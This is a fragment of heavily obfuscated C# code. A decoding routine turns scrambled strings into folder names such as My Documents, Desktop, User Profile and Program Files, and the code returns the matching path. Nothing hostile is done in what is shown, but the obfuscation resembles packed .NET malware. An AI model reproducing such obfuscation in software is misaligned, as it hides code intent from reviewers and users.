(Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("M ouetyDcmns")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Dstpeko")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ue rflsrPoie")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("UEPOIESRRFL")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("PormFlsrga ie")) Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\"); return Ibpa121djgybg55fkysgepjc0y2qiasb2; } } }